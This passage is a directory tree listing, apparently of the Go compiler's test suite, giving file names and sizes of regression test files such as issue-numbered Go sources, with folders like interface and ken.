│ │ │ ├── [4.0K] issue42401.dir
│ │ │ │ ├── [ 241] a.go
│ │ │ │ └── [ 351] b.go
│ │ │ ├── [ 323] issue42401.go
│ │ │ ├── [ 602] issue4251.go
│ │ │ ├── [4.0K] issue4252.dir
│ │ │ │ ├── [ 807] a.go
│ │ │ │ └── [ 435] main.go
│ │ │ ├── [ 313] issue4252.go
│ │ │ ├── [ 415] issue42568.go
│ │ │ ├── [ 263] issue42587.go
│ │ │ ├── [ 366] issue4264.go
│ │ │ ├── [ 281] issue42686.go
│ │ │ ├── [ 340] issue42703.go
│ │ │ ├── [ 400] issue42727.go
│ │ │ ├── [ 285] issue42753.go
│ │ │ ├── [ 426] issue42784.go
│ │ │ ├── [ 235] issue42790.go
│ │ │ ├── [ 366] issue4283.go
│ │ │ ├── [ 341] issue42876.go
│ │ │ ├── [ 513] issue42944.go
│ │ │ ├── [ 858] issue43099.go
│ │ │ ├── [ 896] issue43111.go
│ │ │ ├── [ 723] issue43112.go
│ │ │ ├── [ 546] issue4313.go
│ │ │ ├── [4.0K] issue43164.dir
│ │ │ │ ├── [ 269] a.go
│ │ │ │ └── [ 237] b.go
│ │ │ ├── [ 191] issue43164.go
│ │ │ ├── [ 368] issue43167.go
│ │ │ ├── [ 972] issue4316.go
│ │ │ ├── [ 610] issue4323.go
│ │ │ ├── [4.0K] issue4326.dir
│ │ │ │ ├── [ 214] p1.go
│ │ │ │ ├── [ 59] p2.go
│ │ │ │ ├── [ 142] q1.go
│ │ │ │ ├── [ 136] q2.go
│ │ │ │ └── [ 84] z.go
│ │ │ ├── [ 253] issue4326.go
│ │ │ ├── [ 632] issue43292.go
│ │ │ ├── [1.9K] issue43384.go
│ │ │ ├── [ 722] issue43428.go
│ │ │ ├── [ 343] issue43444.go
│ │ │ ├── [ 10] issue43444.out
│ │ │ ├── [4.0K] issue43479.dir
│ │ │ │ ├── [ 466] a.go
│ │ │ │ └── [ 611] b.go
│ │ │ ├── [ 191] issue43479.go
│ │ │ ├── [ 626] issue43480.go
│ │ │ ├── [ 584] issue4348.go
│ │ │ ├── [ 418] issue4353.go
│ │ │ ├── [4.0K] issue43551.dir
│ │ │ │ ├── [ 104] a.go
│ │ │ │ └── [ 259] b.go
│ │ │ ├── [ 191] issue43551.go
│ │ │ ├── [ 661] issue43570.go
│ │ │ ├── [ 377] issue4359.go
│ │ │ ├── [2.2K] issue43619.go
│ │ │ ├── [4.0K] issue43633.dir
│ │ │ │ ├── [ 378] a.go
│ │ │ │ └── [ 281] main.go
│ │ │ ├── [ 187] issue43633.go
│ │ │ ├── [ 469] issue4365.go
│ │ │ ├── [ 387] issue43677.go
│ │ │ ├── [ 290] issue43701.go
│ │ │ ├── [4.0K] issue4370.dir
│ │ │ │ ├── [ 310] p1.go
│ │ │ │ ├── [ 246] p2.go
│ │ │ │ └── [ 238] p3.go
│ │ │ ├── [ 266] issue4370.go
│ │ │ ├── [ 607] issue43762.go
│ │ │ ├── [ 593] issue43835.go
│ │ │ ├── [ 473] issue43908.go
│ │ │ ├── [4.0K] issue43962.dir
│ │ │ │ ├── [ 173] a.go
│ │ │ │ └── [ 225] b.go
│ │ │ ├── [ 258] issue43962.go
│ │ │ ├── [ 627] issue4396a.go
│ │ │ ├── [ 496] issue4396b.go
│ │ │ ├── [ 301] issue4399.go
│ │ │ ├── [ 413] issue4405.go
│ │ │ ├── [ 346] issue44266.go
│ │ │ ├── [ 317] issue4429.go
│ │ │ ├── [4.0K] issue44325.dir
│ │ │ │ ├── [ 248] a.go
│ │ │ │ └── [ 212] b.go
│ │ │ ├── [ 192] issue44325.go
│ │ │ ├── [4.0K] issue44330.dir
│ │ │ │ ├── [ 468] a.go
│ │ │ │ └── [ 346] b.go
│ │ │ ├── [ 188] issue44330.go
│ │ │ ├── [4.0K] issue44335.dir
│ │ │ │ ├── [ 314] a.go
│ │ │ │ └── [ 209] b.go
│ │ │ ├── [ 192] issue44335.go
│ │ │ ├── [ 575] issue44344.go
│ │ │ ├── [4.0K] issue44355.dir
│ │ │ │ ├── [ 205] a.go
│ │ │ │ └── [ 200] b.go
│ │ │ ├── [ 192] issue44355.go
│ │ │ ├── [4.0K] issue44370.dir
│ │ │ │ ├── [ 682] a.go
│ │ │ │ └── [ 248] b.go
│ │ │ ├── [ 192] issue44370.go
│ │ │ ├── [1.3K] issue44378.go
│ │ │ ├── [ 337] issue44383.go
│ │ │ ├── [ 336] issue44432.go
│ │ │ ├── [ 375] issue44465.go
│ │ │ ├── [ 718] issue4448.go
│ │ │ ├── [ 359] issue4452.go
│ │ │ ├── [ 434] issue4458.go
│ │ │ ├── [2.4K] issue4463.go
│ │ │ ├── [ 759] issue4468.go
│ │ │ ├── [ 364] issue4470.go
│ │ │ ├── [4.0K] issue44732.dir
│ │ │ │ ├── [4.0K] bar
│ │ │ │ │ └── [ 236] bar.go
│ │ │ │ ├── [4.0K] foo
│ │ │ │ │ └── [ 262] foo.go
│ │ │ │ └── [ 279] main.go
│ │ │ ├── [ 189] issue44732.go
│ │ │ ├── [1.1K] issue44739.go
│ │ │ ├── [ 492] issue44823.go
│ │ │ ├── [ 372] issue44830.go
│ │ │ ├── [ 369] issue4495.go
│ │ │ ├── [ 997] issue45045.go
│ │ │ ├── [4.0K] issue4510.dir
│ │ │ │ ├── [ 245] f1.go
│ │ │ │ └── [ 246] f2.go
│ │ │ ├── [ 194] issue4510.go
│ │ │ ├── [ 386] issue45175.go
│ │ │ ├── [ 245] issue4517a.go
│ │ │ ├── [ 247] issue4517b.go
│ │ │ ├── [ 247] issue4517c.go
│ │ │ ├── [ 265] issue4517d.go
│ │ │ ├── [ 942] issue4518.go
│ │ │ ├── [ 586] issue45242.go
│ │ │ ├── [ 397] issue45258.go
│ │ │ ├── [ 572] issue4529.go
│ │ │ ├── [ 346] issue45323.go
│ │ │ ├── [ 350] issue45344.go
│ │ │ ├── [ 320] issue45359.go
│ │ │ ├── [ 511] issue4545.go
│ │ │ ├── [4.0K] issue45503.dir
│ │ │ │ ├── [ 269] a.go
│ │ │ │ └── [ 217] b.go
│ │ │ ├── [ 282] issue45503.go
│ │ │ ├── [ 283] issue45606.go
│ │ │ ├── [ 881] issue4562.go
│ │ │ ├── [ 290] issue45665.go
│ │ │ ├── [ 291] issue45693.go
│ │ │ ├── [ 405] issue45706.go
│ │ │ ├── [ 326] issue45743.go
│ │ │ ├── [ 325] issue45804.go
│ │ │ ├── [1.3K] issue45851.go
│ │ │ ├── [2.5K] issue4585.go
│ │ │ ├── [4.0K] issue4590.dir
│ │ │ │ ├── [ 438] pkg1.go
│ │ │ │ ├── [ 340] pkg2.go
│ │ │ │ └── [ 438] prog.go
│ │ │ ├── [ 276] issue4590.go
│ │ │ ├── [ 389] issue45913.go
│ │ │ ├── [ 259] issue45947.go
│ │ │ ├── [ 307] issue45948.go
│ │ │ ├── [ 335] issue4610.go
│ │ │ ├── [ 419] issue4614.go
│ │ │ ├── [ 652] issue4618.go
│ │ │ ├── [ 398] issue4620.go
│ │ │ ├── [1.7K] issue46234.go
│ │ │ ├── [1.1K] issue46304.go
│ │ │ ├── [ 461] issue46386.go
│ │ │ ├── [ 409] issue46525.go
│ │ │ ├── [2.7K] issue4654.go
│ │ │ ├── [ 321] issue46556.go
│ │ │ ├── [ 317] issue4663.go
│ │ │ ├── [4.0K] issue46653.dir
│ │ │ │ ├── [4.0K] bad
│ │ │ │ │ └── [ 953] bad.go
│ │ │ │ └── [ 378] main.go
│ │ │ ├── [ 291] issue46653.go
│ │ │ ├── [ 558] issue4667.go
│ │ │ ├── [ 282] issue46720.go
│ │ │ ├── [ 763] issue46725.go
│ │ │ ├── [1.4K] issue46749.go
│ │ │ ├── [ 594] issue46903.go
│ │ │ ├── [ 242] issue46907.go
│ │ │ ├── [ 584] issue46938.go
│ │ │ ├── [ 351] issue46957.go
│ │ │ ├── [4.0K] issue47068.dir
│ │ │ │ ├── [ 478] a.go
│ │ │ │ ├── [ 334] b.go
│ │ │ │ └── [ 230] main.go
│ │ │ ├── [ 187] issue47068.go
│ │ │ ├── [4.0K] issue47087.dir
│ │ │ │ ├── [ 236] a.go
│ │ │ │ ├── [ 236] b.go
│ │ │ │ └── [ 292] main.go
│ │ │ ├── [ 187] issue47087.go
│ │ │ ├── [4.0K] issue47131.dir
│ │ │ │ ├── [ 267] a.go
│ │ │ │ └── [ 243] b.go
│ │ │ ├── [ 191] issue47131.go
│ │ │ ├── [4.0K] issue47185.dir
│ │ │ │ ├── [4.0K] bad
│ │ │ │ │ └── [1.1K] bad.go
│ │ │ │ └── [ 385] main.go
│ │ │ ├── [ 313] issue47185.go
│ │ │ ├── [4.0K] issue47201.dir
│ │ │ │ ├── [ 227] a.go
│ │ │ │ └── [ 277] b.go
│ │ │ ├── [ 194] issue47201.go
│ │ │ ├── [ 396] issue47227.go
│ │ │ ├── [4.0K] issue47317.dir
│ │ │ │ ├── [ 183] a.s
│ │ │ │ └── [ 330] x.go
│ │ │ ├── [ 189] issue47317.go
│ │ │ ├── [ 359] issue4734.go
│ │ │ ├── [ 374] issue4748.go
│ │ │ ├── [ 513] issue4752.go
│ │ │ ├── [ 321] issue47712.go
│ │ │ ├── [ 318] issue4776.go
│ │ │ ├── [ 433] issue47771.go
│ │ │ ├── [ 378] issue4785.go
│ │ │ ├── [ 386] issue47928.go
│ │ │ ├── [ 466] issue48026.go
│ │ │ ├── [ 554] issue48033.go
│ │ │ ├── [4.0K] issue48088.dir
│ │ │ │ ├── [ 285] a.go
│ │ │ │ └── [ 205] b.go
│ │ │ ├── [ 191] issue48088.go
│ │ │ ├── [ 413] issue48092.go
│ │ │ ├── [ 338] issue48097.go
│ │ │ ├── [1.1K] issue4813.go
│ │ │ ├── [ 289] issue48230.go
│ │ │ ├── [ 449] issue48289.go
│ │ │ ├── [ 299] issue48301.go
│ │ │ ├── [ 360] issue48357.go
│ │ │ ├── [ 259] issue48459.go
│ │ │ ├── [2.2K] issue48471.go
│ │ │ ├── [ 586] issue48473.go
│ │ │ ├── [ 402] issue48476.go
│ │ │ ├── [ 517] issue4847.go
│ │ │ ├── [ 500] issue48536.go
│ │ │ ├── [2.9K] issue48558.go
│ │ │ ├── [ 702] issue48784.go
│ │ │ ├── [4.0K] issue4879.dir
│ │ │ │ ├── [ 466] a.go
│ │ │ │ └── [ 136] b.go
│ │ │ ├── [ 284] issue4879.go
│ │ │ ├── [ 709] issue48834.go
│ │ │ ├── [1.0K] issue48835.go
│ │ │ ├── [ 666] issue48898.go
│ │ │ ├── [ 5] issue48898.out
│ │ │ ├── [ 535] issue48916.go
│ │ │ ├── [ 255] issue49003.go
│ │ │ ├── [ 264] issue49005a.go
│ │ │ ├── [ 361] issue49005b.go
│ │ │ ├── [4.0K] issue49016.dir
│ │ │ │ ├── [ 543] a.go
│ │ │ │ ├── [ 358] b.go
│ │ │ │ ├── [ 211] c.go
│ │ │ │ ├── [ 211] d.go
│ │ │ │ ├── [ 205] e.go
│ │ │ │ ├── [ 200] f.go
│ │ │ │ └── [ 200] g.go
│ │ │ ├── [ 191] issue49016.go
│ │ │ ├── [ 387] issue49029.go
│ │ │ ├── [4.0K] issue49094.dir
│ │ │ │ ├── [ 226] a.go
│ │ │ │ ├── [ 222] b.go
│ │ │ │ └── [ 234] p.go
│ │ │ ├── [ 191] issue49094.go
│ │ │ ├── [ 839] issue4909a.go
│ │ │ ├── [1.3K] issue4909b.go
│ │ │ ├── [ 387] issue49100b.go
│ │ │ ├── [ 12] issue49100b.out
│ │ │ ├── [ 377] issue49100.go
│ │ │ ├── [ 48] issue49100.out
│ │ │ ├── [ 389] issue49110.go
│ │ │ ├── [ 320] issue49122.go
│ │ │ ├── [4.0K] issue49143.dir
│ │ │ │ ├── [ 451] a.go
│ │ │ │ ├── [ 291] b.go
│ │ │ │ ├── [ 309] c.go
│ │ │ │ └── [ 212] p.go
│ │ │ ├── [ 191] issue49143.go
│ │ │ ├── [ 357] issue49145.go
│ │ │ ├── [ 6] issue49145.out
│ │ │ ├── [ 227] issue49240.go
│ │ │ ├── [ 683] issue49249.go
│ │ │ ├── [ 639] issue49282.go
│ │ │ ├── [4.0K] issue4932.dir
│ │ │ │ ├── [ 190] foo.go
│ │ │ │ ├── [ 216] state2.go
│ │ │ │ └── [ 434] state.go
│ │ │ ├── [ 251] issue4932.go
│ │ │ ├── [ 338] issue49368.go
│ │ │ ├── [ 455] issue49378.go
│ │ │ ├── [ 809] issue49512.go
│ │ │ ├── [ 247] issue49592.go
│ │ │ ├── [ 204] issue49611.go
│ │ │ ├── [ 324] issue49619.go
│ │ │ ├── [4.0K] issue4964.dir
│ │ │ │ ├── [ 379] a.go
│ │ │ │ └── [ 484] b.go
│ │ │ ├── [ 280] issue4964.go
│ │ │ ├── [ 330] issue49665.go
│ │ │ ├── [ 28] issue49665.out
│ │ │ ├── [ 300] issue49767.go
│ │ │ ├── [ 408] issue49814.go
│ │ │ ├── [ 310] issue5002.go
│ │ │ ├── [ 407] issue50169.go
│ │ │ ├── [ 446] issue50190.go
│ │ │ ├── [ 959] issue50372.go
│ │ │ ├── [ 259] issue50439.go
│ │ │ ├── [ 517] issue5056.go
│ │ │ ├── [ 599] issue50671.go
│ │ │ ├── [ 890] issue50854.go
│ │ │ ├── [ 362] issue5089.go
│ │ │ ├── [4.0K] issue5105.dir
│ │ │ │ ├── [ 207] a.go
│ │ │ │ └── [ 286] b.go
│ │ │ ├── [ 275] issue5105.go
│ │ │ ├── [ 523] issue51101.go
│ │ │ ├── [4.0K] issue5125.dir
│ │ │ │ ├── [ 292] bug.go
│ │ │ │ └── [ 208] main.go
│ │ │ ├── [ 288] issue5125.go
│ │ │ ├── [ 766] issue51401.go
│ │ │ ├── [ 314] issue51437.go
│ │ │ ├── [ 459] issue51531.go
│ │ │ ├── [2.3K] issue5162.go
│ │ │ ├── [ 506] issue5172.go
│ │ │ ├── [ 317] issue51839.go
│ │ │ ├── [ 245] issue52020.go
│ │ │ ├── [1.2K] issue52127.go
│ │ │ ├── [ 208] issue52278.go
│ │ │ ├── [ 742] issue5231.go
│ │ │ ├── [ 489] issue52438.go
│ │ │ ├── [ 497] issue5244.go
│ │ │ ├── [4.0K] issue5259.dir
│ │ │ │ ├── [ 273] bug.go
│ │ │ │ └── [ 264] main.go
│ │ │ ├── [ 263] issue5259.go
│ │ │ ├── [4.0K] issue5260.dir
│ │ │ │ ├── [ 192] a.go
│ │ │ │ └── [ 215] b.go
│ │ │ ├── [ 289] issue5260.go
│ │ │ ├── [4.0K] issue5291.dir
│ │ │ │ ├── [ 515] pkg1.go
│ │ │ │ └── [ 307] prog.go
│ │ │ ├── [ 212] issue5291.go
│ │ │ ├── [ 384] issue5358.go
│ │ │ ├── [1.4K] issue5373.go
│ │ │ ├── [4.0K] issue5470.dir
│ │ │ │ ├── [ 532] a.go
│ │ │ │ └── [ 234] b.go
│ │ │ ├── [ 273] issue5470.go
│ │ │ ├── [ 953] issue5493.go
│ │ │ ├── [ 597] issue5515.go
│ │ │ ├── [ 575] issue5581.go
│ │ │ ├── [ 777] issue5607.go
│ │ │ ├── [ 394] issue5609.go
│ │ │ ├── [4.0K] issue5614.dir
│ │ │ │ ├── [ 255] rethinkgo.go
│ │ │ │ ├── [ 60] x.go
│ │ │ │ └── [ 37] y.go
│ │ │ ├── [ 320] issue5614.go
│ │ │ ├── [ 396] issue5698.go
│ │ │ ├── [1.0K] issue5704.go
│ │ │ ├── [ 502] issue5753.go
│ │ │ ├── [4.0K] issue5755.dir
│ │ │ │ ├── [1.3K] a.go
│ │ │ │ └── [ 385] main.go
│ │ │ ├── [ 291] issue5755.go
│ │ │ ├── [ 793] issue5793.go
│ │ │ ├── [ 529] issue5809.go
│ │ │ ├── [ 402] issue5820.go
│ │ │ ├── [ 331] issue5841.go
│ │ │ ├── [ 586] issue5856.go
│ │ │ ├── [4.0K] issue5910.dir
│ │ │ │ ├── [ 404] a.go
│ │ │ │ └── [ 236] main.go
│ │ │ ├── [ 272] issue5910.go
│ │ │ ├── [4.0K] issue5957.dir
│ │ │ │ ├── [ 28] a.go
│ │ │ │ ├── [ 19] b.go
│ │ │ │ └── [ 546] c.go
│ │ │ ├── [ 194] issue5957.go
│ │ │ ├── [ 929] issue5963.go
│ │ │ ├── [ 426] issue6004.go
│ │ │ ├── [ 638] issue6036.go
│ │ │ ├── [ 563] issue6055.go
│ │ │ ├── [ 371] issue6131.go
│ │ │ ├── [ 466] issue6140.go
│ │ │ ├── [ 381] issue6247.go
│ │ │ ├── [ 627] issue6269.go
│ │ │ ├── [4.0K] issue6295.dir
│ │ │ │ ├── [ 237] p0.go
│ │ │ │ ├── [ 339] p1.go
│ │ │ │ └── [ 327] p2.go
│ │ │ ├── [ 275] issue6295.go
│ │ │ ├── [ 328] issue6298.go
│ │ │ ├── [ 290] issue6399.go
│ │ │ ├── [ 365] issue6402.go
│ │ │ ├── [ 445] issue6403.go
│ │ │ ├── [ 329] issue6405.go
│ │ │ ├── [ 271] issue6406.go
│ │ │ ├── [ 281] issue6428.go
│ │ │ ├── [ 451] issue6500.go
│ │ │ ├── [4.0K] issue6513.dir
│ │ │ │ ├── [ 192] a.go
│ │ │ │ ├── [ 206] b.go
│ │ │ │ └── [ 251] main.go
│ │ │ ├── [ 282] issue6513.go
│ │ │ ├── [ 452] issue6572.go
│ │ │ ├── [1.0K] issue6671.go
│ │ │ ├── [ 334] issue6703a.go
│ │ │ ├── [ 334] issue6703b.go
│ │ │ ├── [ 352] issue6703c.go
│ │ │ ├── [ 364] issue6703d.go
│ │ │ ├── [ 375] issue6703e.go
│ │ │ ├── [ 375] issue6703f.go
│ │ │ ├── [ 388] issue6703g.go
│ │ │ ├── [ 408] issue6703h.go
│ │ │ ├── [ 406] issue6703i.go
│ │ │ ├── [ 405] issue6703j.go
│ │ │ ├── [ 358] issue6703k.go
│ │ │ ├── [ 358] issue6703l.go
│ │ │ ├── [ 436] issue6703m.go
│ │ │ ├── [ 436] issue6703n.go
│ │ │ ├── [ 403] issue6703o.go
│ │ │ ├── [ 403] issue6703p.go
│ │ │ ├── [ 476] issue6703q.go
│ │ │ ├── [ 476] issue6703r.go
│ │ │ ├── [ 369] issue6703s.go
│ │ │ ├── [ 390] issue6703t.go
│ │ │ ├── [ 383] issue6703u.go
│ │ │ ├── [ 383] issue6703v.go
│ │ │ ├── [ 381] issue6703w.go
│ │ │ ├── [ 381] issue6703x.go
│ │ │ ├── [ 446] issue6703y.go
│ │ │ ├── [ 446] issue6703z.go
│ │ │ ├── [ 528] issue6750.go
│ │ │ ├── [ 454] issue6772.go
│ │ │ ├── [4.0K] issue6789.dir
│ │ │ │ ├── [ 270] a.go
│ │ │ │ └── [ 221] b.go
│ │ │ ├── [ 302] issue6789.go
│ │ │ ├── [1.2K] issue6847.go
│ │ │ ├── [1.5K] issue6866.go
│ │ │ ├── [1.8K] issue6889.go
│ │ │ ├── [ 244] issue6899.go
│ │ │ ├── [ 15] issue6899.out
│ │ │ ├── [ 333] issue6902.go
│ │ │ ├── [ 274] issue6964.go
│ │ │ ├── [1.1K] issue6977.go
│ │ │ ├── [4.0K] issue7023.dir
│ │ │ │ ├── [ 201] a.go
│ │ │ │ └── [ 204] b.go
│ │ │ ├── [ 274] issue7023.go
│ │ │ ├── [2.2K] issue7044.go
│ │ │ ├── [ 329] issue7050.go
│ │ │ ├── [ 303] issue7083.go
│ │ │ ├── [ 581] issue7129.go
│ │ │ ├── [ 754] issue7150.go
│ │ │ ├── [ 434] issue7153.go
│ │ │ ├── [ 817] issue7214.go
│ │ │ ├── [ 615] issue7223.go
│ │ │ ├── [ 763] issue7272.go
│ │ │ ├── [ 614] issue7310.go
│ │ │ ├── [ 777] issue7316.go
│ │ │ ├── [ 303] issue7346.go
│ │ │ ├── [ 363] issue7366.go
│ │ │ ├── [ 638] issue7405.go
│ │ │ ├── [ 378] issue7419.go
│ │ │ ├── [ 370] issue7525b.go
│ │ │ ├── [ 370] issue7525c.go
│ │ │ ├── [ 399] issue7525d.go
│ │ │ ├── [ 398] issue7525e.go
│ │ │ ├── [ 402] issue7525.go
│ │ │ ├── [ 305] issue7538a.go
│ │ │ ├── [ 252] issue7538b.go
│ │ │ ├── [ 305] issue7547.go
│ │ │ ├── [ 551] issue7550.go
│ │ │ ├── [ 349] issue7590.go
│ │ │ ├── [4.0K] issue7648.dir
│ │ │ │ ├── [ 275] a.go
│ │ │ │ └── [ 212] b.go
│ │ │ ├── [ 262] issue7648.go
│ │ │ ├── [ 785] issue7675.go
│ │ │ ├── [1.2K] issue7690.go
│ │ │ ├── [ 736] issue7740.go
│ │ │ ├── [ 362] issue7742.go
│ │ │ ├── [2.4K] issue7746.go
│ │ │ ├── [1017] issue7760.go
│ │ │ ├── [ 236] issue7794.go
│ │ │ ├── [ 790] issue7863.go
│ │ │ ├── [ 825] issue7867.go
│ │ │ ├── [ 291] issue7884.go
│ │ │ ├── [2.2K] issue7921.go
│ │ │ ├── [ 558] issue7944.go
│ │ │ ├── [4.0K] issue7995b.dir
│ │ │ │ ├── [ 123] x1.go
│ │ │ │ └── [ 110] x2.go
│ │ │ ├── [ 239] issue7995b.go
│ │ │ ├── [ 379] issue7995.go
│ │ │ ├── [ 308] issue7996.go
│ │ │ ├── [ 732] issue7997.go
│ │ │ ├── [ 380] issue7998.go
│ │ │ ├── [1.1K] issue8004.go
│ │ │ ├── [ 330] issue8011.go
│ │ │ ├── [ 540] issue8017.go
│ │ │ ├── [ 426] issue8028.go
│ │ │ ├── [ 633] issue8036.go
│ │ │ ├── [ 414] issue8039.go
│ │ │ ├── [ 691] issue8042.go
│ │ │ ├── [ 575] issue8047b.go
│ │ │ ├── [ 530] issue8047.go
│ │ │ ├── [2.0K] issue8048.go
│ │ │ ├── [4.0K] issue8060.dir
│ │ │ │ ├── [ 198] a.go
│ │ │ │ └── [ 232] b.go
│ │ │ ├── [ 232] issue8060.go
│ │ │ ├── [ 318] issue8073.go
│ │ │ ├── [ 330] issue8074.go
│ │ │ ├── [ 342] issue8076.go
│ │ │ ├── [ 279] issue8079.go
│ │ │ ├── [ 534] issue8132.go
│ │ │ ├── [ 800] issue8139.go
│ │ │ ├── [ 313] issue8154.go
│ │ │ ├── [ 711] issue8155.go
│ │ │ ├── [ 767] issue8158.go
│ │ │ ├── [ 622] issue8183.go
│ │ │ ├── [4.0K] issue8280.dir
│ │ │ │ ├── [ 49] a.go
│ │ │ │ └── [ 41] b.go
│ │ │ ├── [ 277] issue8280.go
│ │ │ ├── [ 333] issue8311.go
│ │ │ ├── [ 617] issue8325.go
│ │ │ ├── [ 515] issue8336.go
│ │ │ ├── [ 433] issue8347.go
│ │ │ ├── [1.2K] issue8385.go
│ │ │ ├── [ 549] issue8438.go
│ │ │ ├── [ 281] issue8440.go
│ │ │ ├── [ 422] issue8475.go
│ │ │ ├── [ 374] issue8501.go
│ │ │ ├── [ 375] issue8507.go
│ │ │ ├── [1.9K] issue8606b.go
│ │ │ ├── [2.1K] issue8606.go
│ │ │ ├── [ 525] issue8612.go
│ │ │ ├── [ 608] issue8613.go
│ │ │ ├── [ 496] issue8620.go
│ │ │ ├── [ 369] issue8745.go
│ │ │ ├── [ 521] issue8761.go
│ │ │ ├── [ 381] issue8836.go
│ │ │ ├── [ 525] issue887.go
│ │ │ ├── [ 751] issue8947.go
│ │ │ ├── [ 454] issue8961.go
│ │ │ ├── [ 520] issue9006.go
│ │ │ ├── [ 779] issue9017.go
│ │ │ ├── [ 805] issue9036.go
│ │ │ ├── [ 551] issue9076.go
│ │ │ ├── [ 839] issue9083.go
│ │ │ ├── [1.7K] issue9110.go
│ │ │ ├── [ 538] issue9321.go
│ │ │ ├── [4.0K] issue9355.dir
│ │ │ │ └── [ 210] a.go
│ │ │ ├── [1.3K] issue9355.go
│ │ │ ├── [5.0K] issue9370.go
│ │ │ ├── [ 390] issue9432.go
│ │ │ ├── [ 597] issue9521.go
│ │ │ ├── [4.0K] issue9537.dir
│ │ │ │ ├── [ 386] a.go
│ │ │ │ └── [ 678] b.go
│ │ │ ├── [ 284] issue9537.go
│ │ │ ├── [4.8K] issue9604b.go
│ │ │ ├── [ 631] issue9604.go
│ │ │ ├── [4.0K] issue9608.dir
│ │ │ │ └── [1.0K] issue9608.go
│ │ │ ├── [ 478] issue9608.go
│ │ │ ├── [ 403] issue9634.go
│ │ │ ├── [ 444] issue9691.go
│ │ │ ├── [ 331] issue9731.go
│ │ │ ├── [ 302] issue9738.go
│ │ │ ├── [ 265] issue9862.go
│ │ │ └── [ 643] issue9862_run.go
│ │ ├── [3.0K] floatcmp.go
│ │ ├── [7.9K] float_lit2.go
│ │ ├── [1.7K] float_lit3.go
│ │ ├── [4.0K] float_lit.go
│ │ ├── [ 844] for.go
│ │ ├── [ 445] func1.go
│ │ ├── [ 578] func2.go
│ │ ├── [ 505] func3.go
│ │ ├── [ 409] func4.go
│ │ ├── [1.5K] func5.go
│ │ ├── [ 393] func6.go
│ │ ├── [ 477] func7.go
│ │ ├── [ 599] func8.go
│ │ ├── [ 721] funcdup2.go
│ │ ├── [1.3K] funcdup.go
│ │ ├── [1.3K] func.go
│ │ ├── [5.3K] fuse.go
│ │ ├── [ 303] gc1.go
│ │ ├── [ 972] gc2.go
│ │ ├── [ 411] gc.go
│ │ ├── [ 35K] gcgort.go
│ │ ├── [ 872] gcstring.go
│ │ ├── [ 722] goprint.go
│ │ ├── [ 65] goprint.out
│ │ ├── [8.4K] goto.go
│ │ ├── [9.5K] heapsampling.go
│ │ ├── [ 269] helloworld.go
│ │ ├── [ 13] helloworld.out
│ │ ├── [1.4K] if.go
│ │ ├── [ 621] import1.go
│ │ ├── [4.0K] import2.dir
│ │ │ ├── [1.8K] import2.go
│ │ │ └── [1.3K] import3.go
│ │ ├── [ 247] import2.go
│ │ ├── [4.0K] import4.dir
│ │ │ ├── [ 213] empty.go
│ │ │ └── [ 710] import4.go
│ │ ├── [ 310] import4.go
│ │ ├── [ 722] import5.go
│ │ ├── [1.4K] import6.go
│ │ ├── [ 425] import.go
│ │ ├── [ 301] index0.go
│ │ ├── [ 305] index1.go
│ │ ├── [ 305] index2.go
│ │ ├── [6.4K] index.go
│ │ ├── [1.5K] indirect1.go
│ │ ├── [1.4K] indirect.go
│ │ ├── [1.1K] init1.go
│ │ ├── [1.2K] initcomma.go
│ │ ├── [ 604] initempty.go
│ │ ├── [1.7K] initexp.go
│ │ ├── [ 479] init.go
│ │ ├── [1.2K] initialize.go
│ │ ├── [1.1K] initializerr.go
│ │ ├── [ 407] initloop.go
│ │ ├── [ 13K] inline_big.go
│ │ ├── [1.4K] inline_caller.go
│ │ ├── [1.9K] inline_callers.go
│ │ ├── [ 849] inline_endian.go
│ │ ├── [ 10K] inline.go
│ │ ├── [1.0K] inline_literal.go
│ │ ├── [ 569] inline_math_bits_rotate.go
│ │ ├── [1.5K] inline_sync.go
│ │ ├── [ 513] inline_variadic.go
│ │ ├── [4.3K] intcvt.go
│ │ ├── [4.0K] interface
│ │ │ ├── [1.8K] assertinline.go
│ │ │ ├── [1.4K] bigdata.go
│ │ │ ├── [ 393] convert1.go
│ │ │ ├── [ 393] convert2.go
│ │ │ ├── [1.9K] convert.go
│ │ │ ├── [4.0K] embed1.dir
│ │ │ │ ├── [ 411] embed0.go
│ │ │ │ └── [ 589] embed1.go
│ │ │ ├── [ 250] embed1.go
│ │ │ ├── [1.5K] embed2.go
│ │ │ ├── [4.0K] embed3.dir
│ │ │ │ ├── [ 305] embed0.go
│ │ │ │ └── [1.6K] embed1.go
│ │ │ ├── [ 187] embed3.go
│ │ │ ├── [ 924] embed.go
│ │ │ ├── [2.0K] explicit.go
│ │ │ ├── [ 544] fail.go
│ │ │ ├── [1.8K] fake.go
│ │ │ ├── [ 641] noeq.go
│ │ │ ├── [ 758] pointer.go
│ │ │ ├── [4.0K] private.dir
│ │ │ │ ├── [ 389] private1.go
│ │ │ │ └── [ 608] prog.go
│ │ │ ├── [ 285] private.go
│ │ │ ├── [ 790] receiver1.go
│ │ │ ├── [1.3K] receiver.go
│ │ │ ├── [4.0K] recursive1.dir
│ │ │ │ ├── [ 304] recursive1.go
│ │ │ │ └── [ 434] recursive2.go
│ │ │ ├── [ 267] recursive1.go
│ │ │ ├── [ 374] recursive.go
│ │ │ ├── [ 670] returntype.go
│ │ │ └── [2.4K] struct.go
│ │ ├── [ 387] int_lit.go
│ │ ├── [ 799] intrinsic_atomic.go
│ │ ├── [4.0K] intrinsic.dir
│ │ │ └── [2.4K] main.go
│ │ ├── [ 259] intrinsic.go
│ │ ├── [1.6K] iota.go
│ │ ├── [4.0K] ken
│ │ │ ├── [2.3K] array.go
│ │ │ ├── [ 879] chan1.go
│ │ │ ├── [4.7K] chan.go
│ │ │ ├── [4.3K] complit.go
│ │ │ ├── [ 15K] convert.go
│ │ │ ├── [ 455] cplx0.go
│ │ │ ├── [ 128] cplx0.out
│ │ │ ├── [1.4K] cplx1.go
│ │ │ ├── [1.9K] cplx2.go
│ │ │ ├── [ 888] cplx3.go
│ │ │ ├── [1.0K] cplx4.go
│ │ │ ├── [1.1K] cplx5.go
│ │ │ ├── [9.2K] divconst.go
│ │ │ ├── [5.1K] divmod.go
│ │ │ ├── [4.3K] embed.go
│ │ │ ├── [ 308] for.go
│ │ │ ├── [2.2K] interbasic.go
│ │ │ ├── [ 872] interfun.go
│ │ │ ├── [1010] intervar.go
│ │ │ ├── [ 439] label.go
│ │ │ ├── [ 410] litfun.go
│ │ │ ├── [ 386] mfunc.go
│ │ │ ├── [9.2K] modconst.go
│ │ │ ├── [ 617] ptrfun.go
│ │ │ ├── [ 772] ptrvar.go
│ │ │ ├── [1.7K] range.go
│ │ │ ├── [1.1K] rob1.go
